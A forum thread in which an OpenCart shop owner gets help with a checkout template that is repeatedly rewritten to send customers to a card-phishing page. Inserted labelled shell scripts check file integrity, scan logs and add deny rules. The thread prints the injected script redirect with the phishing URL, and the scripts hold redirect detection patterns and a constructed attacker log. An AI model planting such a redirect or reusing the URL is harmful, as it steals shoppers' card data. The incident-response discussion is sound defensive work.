Post by gabor » Sat Jun 24, 2017 3:30 pm

We have a website selling our own product, and recently we have a problem: someone comes and changes the checkout every morning around 6 am to a fake fraudulent card site ( https://iwetech.ie/Payment/ ), which basically asks our customers to add card details. We found the code and we can change it back every day, so our main problem is how to prevent this from happening every day. We run OpenCart Version 2.1.0.2. I'm not sure what information I should provide, but feel free to ask.
Thanks guys in advance!

Newbie

Posts

Joined
Sat Jun 24, 2017 3:15 pm

Post by IP_CAM » Sat Jun 24, 2017 6:18 pm

Funny, that https://iwetech.ie/Payment/ URL works, but it's not a valid URL
according to Site Test Tools, if I try to check on it. :choke:
Which means that you probably have some hack in your software doing this. :'(
Ernie

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by gabor » Sat Jun 24, 2017 10:59 pm

What I could find out, it seems to be a code injection hack. Basically, somehow they edit the \catalog\view\theme\default\template\checkout\checkout.tpl file and insert this code:
<div id="content" class="<?php echo $class; ?>"><?php echo $content_top; ?>
<h1><?php echo $heading_title; ?></h1>
<div class="panel-group" id="accordion">
<div class="panel panel-default">
<div class="panel-heading"><script>document.location='https://iwetech.ie/Payment/'</script>
<h4 class="panel-title"><?php echo $text_checkout_option; ?></h4>
</div>
<div class="panel-collapse collapse" id="collapse-checkout-option">
<div class="panel-body"></div>
</div>
</div>

I did a lot of research to solve this problem, but I couldn't find anything usable, and I'm not exactly an expert in the topic, but I really need to solve this problem shortly.

In some places I read about cleaning script tags from strings, but again, I don't exactly know if that's a solution or, if it is, how it works.


Post by IP_CAM » Sun Jun 25, 2017 12:59 am

Well, if this hack has been placed in the DEFAULT
\catalog\view\theme\default\template\checkout\checkout.tpl
then someone must have access to your software on the server.
But if the hack has been placed in the
\system\storage\modification\catalog\view\theme\default\template\checkout\checkout.tpl
then it would have been added by some 'Darknet' OcMod, I assume.
At least, if you use a genuine OC version and no Extension/Mod possibly equipped with
a modified checkout.tpl file and downloaded from some Darknet site. 8)
I can't think of anything else...
Ernie


Post by gabor » Sun Jun 25, 2017 2:10 am

This is the default template that we are using for the website, so the first option you mentioned.
We have changed all the passwords and users many times, for the admin and for the FTP; we changed the user and the permissions to 644, but this still happens. The OS is not from any dark-web related site nor from any illegal source, and in fact we have been running this site for slightly more than a year without any issues.

This hacking thing just started recently, and in my opinion the first question is whether the problem is in the back end, so maybe there is a virus, a robot or whatever that can cause problems like this and rewrite the file, or whether this is a simple attack via the website, like XSS injection or something like that. If we know this comes from outside, then we need to find a way to secure the site. If the problem is already in the software, then we need to reinstall OpenCart to replace it with a fresh one.

The main problem is that we have many orders and customer registrations, which are pretty hard to simply move to another site. If there is any other solution, we would like to start with that in the first place.


Post by IP_CAM » Sun Jun 25, 2017 3:29 am

Well, you did not really answer my question regarding where you
found the modified file, and since the HACK may already exist in your DB,
it does not make much sense to install another shop software and then use
it with the same DB.
You therefore have to download the entire DB content by use of the Server Admin
Tools, and then check the content of the DB to make sure that it's clean. Then
you just upload (not install) a NEW clean OC software and link it to the DB by use
of the already existing old config.php files, and it will function again.
Ernie


Post by gabor » Sun Jun 25, 2017 4:25 am

Sorry, so what I was trying to say is that this is where they placed it: \catalog\view\theme\default\template\checkout\checkout.tpl
Not over here: \system\storage\modification\catalog\view\theme\default\template\checkout\checkout.tpl

I'm not exactly sure what I need to look for in the DB. How can I spot the unwanted data?
And if I upload the new OC software, is this not going to change the structure of the site? I mean the way it works, looks, etc.

Like I said, I'm kind of a noob with this kind of stuff and I would really appreciate the help in detail.


Post by gabor » Sun Jun 25, 2017 4:29 am

And let's say I upload the new OC; is it enough to only replace the config.php in order to make the old data work?

Thanks anyway for your patience and help! ;D


Post by IP_CAM » Sun Jun 25, 2017 8:09 am

Well, strictly technically, YES, but it also depends on the extensions you've possibly installed.
But you have to USE BOTH (old) config.php files, the one in the ROOT and the one in the ADMIN section!
But I would try something different first, just to find out:
1. Upload a clean checkout.tpl
2. CHMOD it to 444 (if you don't know what that means, then read here first:)
http://everyauction.info/serverinfo.html#5
3. Test the shop by ordering an item and fully going through the checkout.
4. Wait until the next day and check your file again.

By doing this CHMOD change, this checkout.tpl can only be used in READ ONLY mode
and not changed by any outside/inside method, so one could check the server error/access log
later to find out what/if something else tried to modify this file again.

Just a weird idea... :D
But I tested it in one of my test shops, so it will work!
Ernie

PS. I also contacted the site in question and warned them that their site will end up on blacklists
if they don't act accordingly!
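
The "upload a clean checkout.tpl, chmod 444, check again tomorrow" routine above, and the later advice to compare every file against a fresh download of the same OpenCart version, can be scripted so the check runs in seconds rather than by eye. The script below is an added example written for this thread; it is not code from the forum posts or from OpenCart. It assumes GNU coreutils (sha256sum, find) on the server, a clean unpacked copy of the matching OpenCart release in one directory and the live shop in another, and uses a placeholder host (phish.example) in its constructed sample instead of the real redirect target.

```shell
#!/bin/sh
# Added example, not code from the thread or from OpenCart: compare a live
# OpenCart tree against a clean copy of the same version, report modified and
# added files, flag templates carrying an inline redirect script, and make the
# templates read-only as a tripwire. Directory names are assumptions; point the
# functions at your own clean and live copies.
set -u

# manifest DIR: "sha256  ./relative/path" for every regular file under DIR.
manifest() {
  ( cd "$1" && find . -type f -exec sha256sum {} + | sort -k2 )
}

# compare_trees CLEAN LIVE: print MODIFIED/ADDED lines for files in LIVE that
# differ from, or do not exist in, CLEAN. Deleted files are not reported.
compare_trees() {
  clean_m=$(mktemp)
  live_m=$(mktemp)
  manifest "$1" > "$clean_m"
  manifest "$2" > "$live_m"
  awk 'NR == FNR { clean[$2] = $1; next }
       ($2 in clean) && clean[$2] != $1 { print "MODIFIED " $2 }
       !($2 in clean)                    { print "ADDED " $2 }' "$clean_m" "$live_m"
  rm -f "$clean_m" "$live_m"
}

# find_redirects LIVE: templates containing a JavaScript location redirect,
# the pattern the injected checkout.tpl in this thread used.
find_redirects() {
  grep -rIl --include='*.tpl' -E 'document\.location|window\.location' \
    "$1/catalog/view/theme" | sed 's|^|REDIRECT |'
}

# lock_templates LIVE: chmod 444 every .tpl and report how many are read-only.
lock_templates() {
  find "$1/catalog/view/theme" -name '*.tpl' -exec chmod 444 {} +
  echo "LOCKED $(find "$1/catalog/view/theme" -name '*.tpl' -perm 444 | wc -l | tr -d ' ')"
}

# demo: build a constructed clean/live pair with one tampered template and one
# dropped file, then run the checks. The output is what a real run prints.
demo() {
  root=$(mktemp -d)
  clean="$root/clean"
  live="$root/live"
  tpl=catalog/view/theme/default/template/checkout
  mkdir -p "$clean/$tpl"
  # constructed stand-ins for two stock templates
  printf '<div id="content"><h1><?php echo $heading_title; ?></h1></div>\n' > "$clean/$tpl/checkout.tpl"
  printf '<p><?php echo $text_message; ?></p>\n' > "$clean/$tpl/success.tpl"
  mkdir -p "$live" && cp -R "$clean/." "$live/"
  # tamper the way the thread describes, with a placeholder host
  printf '<script>document.location=%s</script>\n' "'https://phish.example/Payment/'" >> "$live/$tpl/checkout.tpl"
  mkdir -p "$live/system/storage/cache"
  printf '<?php /* constructed stand-in for a dropped backdoor */ ?>\n' > "$live/system/storage/cache/x.php"
  compare_trees "$clean" "$live"
  find_redirects "$live"
  lock_templates "$live"
  rm -rf "$root"
}

case "${1:-}" in demo) demo ;; esac
```

Run it as `sh check.sh demo` to see the constructed case, or call `compare_trees /path/to/clean-2.1.0.2 /var/www/shop` against the real tree. Expect config.php, admin/config.php, uploaded images and any installed extensions to show up as MODIFIED or ADDED; review those rather than filtering them out, because a dropped PHP file under image/ or system/storage/ looks exactly like an "expected" addition. One caveat on step 2 of the procedure: mode 444 does not stop a process running as the file's owner, which is what PHP under the shop's own account or anyone holding the FTP login is, since it can chmod the file back first. Treat the chmod as a tripwire that shows up in the logs, not as the fix.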

Post by gabor » Sun Jun 25, 2017 5:07 pm

So I changed it now to 444, and let's see. I will come back with an update on this tomorrow.
Strange, because today we still didn't have the attack. So if it's a virus, someone needs to trigger it, or the bot turns off and goes on holiday at the weekend :) However, it's strange!

And I'm really amazed by your support! Really, man, you are awesome! Cheers!


Post by ADD Creative » Mon Jun 26, 2017 8:05 pm

Make sure you change all passwords, including all FTP accounts. It sounds like you have already done this, but check you have changed all of them, and remove any accounts (OpenCart and FTP) that aren't needed any more. Weak and stolen passwords are probably the most common way to get into a site.

Check the files on your server against a fresh download of your OpenCart version to see if any other files have been changed or added.

Look through your server web logs and FTP logs (you may need to ask your host for these) at around the time the attack takes place for anything suspicious.

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom

Post by gabor » Tue Jun 27, 2017 7:25 pm

Well, it seems this trick doesn't exactly work out, as we had the hack today as well, after two days of silence. The interesting thing: we perhaps caught the attacker, as he made a registration on our site just before the script was inserted into the tpl file, and all the details were fake as hell. He/she put something in the basket, and it seems that after that he somehow made the XSS attack, and now the script was inserted into other tpl files as well, to make sure that even if we delete it from checkout.tpl, it will come up with the others, like address confirmation and payment method.
We found the IP, which is actually from Libya, so we locked every IP from that country in the .htaccess, but if it's a VPN attack, then this is useless.

Is there any way we can stop these files from running scripts inside the HTML in certain parts? So we can stop the script from triggering, even if it's already inside the code.


Post by ADD Creative » Wed Jun 28, 2017 12:07 am

There is not much you can do to stop scripts running in the HTML. OpenCart needs JavaScript to work. And even if there was it seems like the attacker could just remove it. You need to find and close the method the attacker is using to upload the changes.

You need to compare all the files on your server to a fresh download of OpenCart. Looking for any changes and added files. It can often be the case that an attacker will install their own backdoor once they have got into a site via another method.

Once you are sure there is no added code. It's just a case of going through the web and FTP logs to see if you can work out how they are uploading files.

Another thing you could check is that you have the PHP JSON extension installed on your server and that you are denying access to folders like the system folder.

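
Both ADD Creative replies point at the web logs around the time the template is rewritten as the place to find the upload path. The script below is an added example for this thread, not code from the posts or from OpenCart. It assumes an Apache combined-format access log (ip, two dashes, bracketed timestamp, quoted request line), a stock layout where every legitimate request goes through /index.php or /admin/index.php (so the admin folder is assumed not to have been renamed), and the five log lines it contains are constructed for the demo using documentation IP ranges.

```shell
#!/bin/sh
# Added example, not from the thread: pull the interesting lines out of an
# Apache combined-format access log around the time the template is rewritten.
# Assumed field layout: ip - - [dd/Mon/yyyy:HH:MM:SS zone] "METHOD path HTTP/x" ...
# The log content in demo() is constructed; the IPs are documentation ranges.
set -u

# requests_in_window LOG FROM_HOUR TO_HOUR: every request whose hour is in the range
# (inclusive), e.g. 05 06 for the "around 6 am" window in the thread.
requests_in_window() {
  awk -v lo="$2" -v hi="$3" '{ split($4, t, ":"); h = t[2] + 0
                              if (h >= lo + 0 && h <= hi + 0) print }' "$1"
}

# direct_php_hits LOG: requests that execute a PHP file other than the front
# controllers. A hit on a .php file under system/, image/ or a theme folder is
# a dropped script being used, because OpenCart never serves those directly.
direct_php_hits() {
  awk '{ split($7, p, "?"); path = p[1]
         if (path ~ /\.php$/ && path != "/index.php" && path != "/admin/index.php")
           print $1, substr($6, 2), path }' "$1"
}

# register_then_php LOG: IPs that submitted the registration form and later hit
# a dropped PHP file, the sequence described in the thread. The log is assumed
# to be in time order, as Apache writes it.
register_then_php() {
  awk '$7 ~ /route=account\/register/ { reg[$1] = 1 }
       { split($7, p, "?"); path = p[1] }
       ($1 in reg) && path ~ /\.php$/ && path != "/index.php" && path != "/admin/index.php" {
         print "SUSPECT", $1, path }' "$1"
}

# demo: constructed log with one attacker (203.0.113.7) and one shopper (198.51.100.4).
demo() {
  log=$(mktemp)
  cat > "$log" <<'EOF'
203.0.113.7 - - [27/Jun/2017:05:58:41 +0100] "POST /index.php?route=account/register HTTP/1.1" 302 - "-" "Mozilla/5.0"
203.0.113.7 - - [27/Jun/2017:05:59:02 +0100] "POST /index.php?route=checkout/cart/add HTTP/1.1" 200 312 "-" "Mozilla/5.0"
203.0.113.7 - - [27/Jun/2017:06:00:13 +0100] "POST /system/storage/cache/x.php HTTP/1.1" 200 15 "-" "python-requests/2.18.1"
198.51.100.4 - - [27/Jun/2017:06:03:50 +0100] "GET /index.php?route=product/category&path=20 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
198.51.100.4 - - [27/Jun/2017:09:15:00 +0100] "GET /image/catalog/logo.png HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
EOF
  echo "== requests between 05:00 and 06:59"
  requests_in_window "$log" 05 06
  echo "== direct PHP execution"
  direct_php_hits "$log"
  echo "== registered, then ran a dropped PHP file"
  register_then_php "$log"
  rm -f "$log"
}

case "${1:-}" in demo) demo ;; esac
```

Run it with `sh logcheck.sh demo`, or point the functions at the real access_log (and at the rotated copies from the days before the first rewrite, since the backdoor was likely dropped earlier than the first visible redirect). FTP transfer logs (for example vsftpd's xferlog) use a different field layout and need their own awk, but the question to answer is the same: which account uploaded or modified checkout.tpl, and from where. An IP that registers and then requests a .php file that is not index.php is the pattern to chase; blocking one country, as noted above, does not close the path it used.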

Post by gabor » Wed Jun 28, 2017 3:13 am

Well, in my opinion he somehow injects the script somewhere at the registration stage. I believe the system should automatically avoid running script commands in the input fields, so when someone like this guy tries to send scripts it shouldn't obey, just simply take it as text, nothing more. Like I said, I'm not really a professional in this; the only thing I know is what I learned in a week of researching the problem, but it still seems this is a really simple XSS, I just don't know where he is inserting this to add this line to the tpl files. There are many fields he can use, like the registration form, the address line, the newsletter, but I can't figure out what to check and how to avoid it. I already found the article about the PHP JSON, but again, it's not clear to me what to do or why this makes the site weak against attacks.

I already compared the two files and the only difference I found is the tpl file. I'm running out of ideas.

Today I will try to install a new OC, the up-to-date version, on a different server to test out how I can transfer all the data.


Post by ADD Creative » Wed Jun 28, 2017 10:57 pm

The attacker seems to be able to write files to your server. This could not be achieved via just XSS (and if it were, it would need you to be clicking on malicious links or viewing pages with hidden malicious code on them). They either have direct access to your server (such as FTP) or are able to execute PHP scripts.

The JSON exploit is said to be able to execute PHP code. The examples given use the customer registration form to perform remote PHP code execution, which is a good match for what you say you are seeing.

To check you have JSON enabled on your server, put the following in a file called info.php and copy it to the html home directory of your server (same place as OpenCart).

<?php
phpinfo();
?>

Then go to info.php on your server in a web browser. On the generated page, find the JSON section and make sure json support is enabled.

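
The two server-side checks raised above (is the PHP JSON extension present, and is direct HTTP access to the system folder denied) can be done from a shell without leaving a phpinfo() page on the site. The script below is an added example for this thread, not code from the posts or from OpenCart. It assumes a stock OpenCart 2.x layout with system/ and system/storage/ under the shop root, an Apache host that honours .htaccess (AllowOverride), and a php CLI on the server for the extension check; the demo directory it builds is constructed.

```shell
#!/bin/sh
# Added example, not from the thread: script two of the checks suggested above.
# (1) Is the PHP JSON extension loaded? When it is absent OpenCart 2.x uses its
#     own pure-PHP json helper, the code path the thread identifies with remote
#     code execution through the registration form.
# (2) Do system/ and system/storage/ carry an .htaccess that refuses direct
#     HTTP requests? Paths assume a stock OpenCart 2.x layout under ROOT.
set -u

# json_extension_loaded: exit 0 when the php CLI reports the json extension.
# Check the web SAPI too (it may read a different php.ini); phpinfo() is the
# thread's way, but remove that file again once you have looked.
json_extension_loaded() {
  php -r 'exit(extension_loaded("json") ? 0 : 1);' 2>/dev/null
}

# deny_rule_present DIR: 0 when DIR/.htaccess blocks all requests (2.2 or 2.4 syntax).
deny_rule_present() {
  [ -f "$1/.htaccess" ] &&
    grep -qiE '^[[:space:]]*(Deny from all|Require all denied)' "$1/.htaccess"
}

# write_deny_rule DIR: install a deny-all .htaccess that works on Apache 2.2 and 2.4.
write_deny_rule() {
  cat > "$1/.htaccess" <<'EOF'
<IfModule mod_authz_core.c>
    Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
    Order deny,allow
    Deny from all
</IfModule>
EOF
}

# check_protected_dirs ROOT: OK/MISSING for each folder that must never be web-served.
check_protected_dirs() {
  for d in system system/storage; do
    if deny_rule_present "$1/$d"; then echo "OK $d"; else echo "MISSING $d"; fi
  done
}

# demo: constructed shop root with unprotected folders, fixed in place.
demo() {
  root=$(mktemp -d)
  mkdir -p "$root/system/storage"
  echo "== before"
  check_protected_dirs "$root"
  write_deny_rule "$root/system"
  write_deny_rule "$root/system/storage"
  echo "== after"
  check_protected_dirs "$root"
  if command -v php >/dev/null 2>&1; then
    if json_extension_loaded; then echo "JSON: extension loaded"
    else echo "JSON: MISSING, OpenCart will use its PHP fallback json helper"; fi
  fi
  rm -rf "$root"
}

case "${1:-}" in demo) demo ;; esac
```

Run `sh harden.sh demo` for the constructed case, or `check_protected_dirs /var/www/shop` on the real root and `write_deny_rule` on whatever comes back MISSING. Two caveats: .htaccess files are ignored on nginx and on Apache vhosts configured with `AllowOverride None`, in which case the same deny rule belongs in the server config; and a deny rule only stops the dropped file from being requested over HTTP, it does not remove it, so pair this with the file comparison against a clean download.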